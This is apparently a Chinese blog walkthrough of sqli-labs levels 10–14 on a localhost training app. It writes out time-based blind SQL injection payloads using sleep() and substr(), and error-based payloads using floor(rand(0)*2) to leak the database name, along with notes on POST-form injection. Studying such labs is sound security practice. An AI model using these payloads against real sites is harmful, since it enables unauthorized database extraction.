0x10 less-10
http://localhost/sqli-labs-master/Less-10/?id=1" and sleep(5)-- + //判断后台闭合方式http://localhost/sqli-labs-master/Less-10/?id=1" and if(substr((select database()),1,1)='s',sleep(5),null)-- + //判断数据库等http://localhost/sqli-labs-master/Less-10/?id=1" and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(5),null)-- +0x11 less-11
从11关开始就由GET型注入变成POST注入了
一般第一个登陆字段(一般是用户名)就用注释,第二个登陆字段(一般就密码)用闭合和注释都是可以的
利用盲注获取信息
0x12 less-12
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”“”) and password=(“”) LIMIT 0,1’ at line 1
由错误信息可以推断出后台句子,其他同less-11
0x13 less-13
这里开始急事正确也不返回信息了,这可怎么办呢,我们想起来之前第六课利用的基于错误的返回
利用到floor()、rand()等
') and (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2))) as c from information_schema.tables group by c)a)-- +0x12 less-14
" and (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2))) as c from information_schema.columns group by c)a) -- +
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
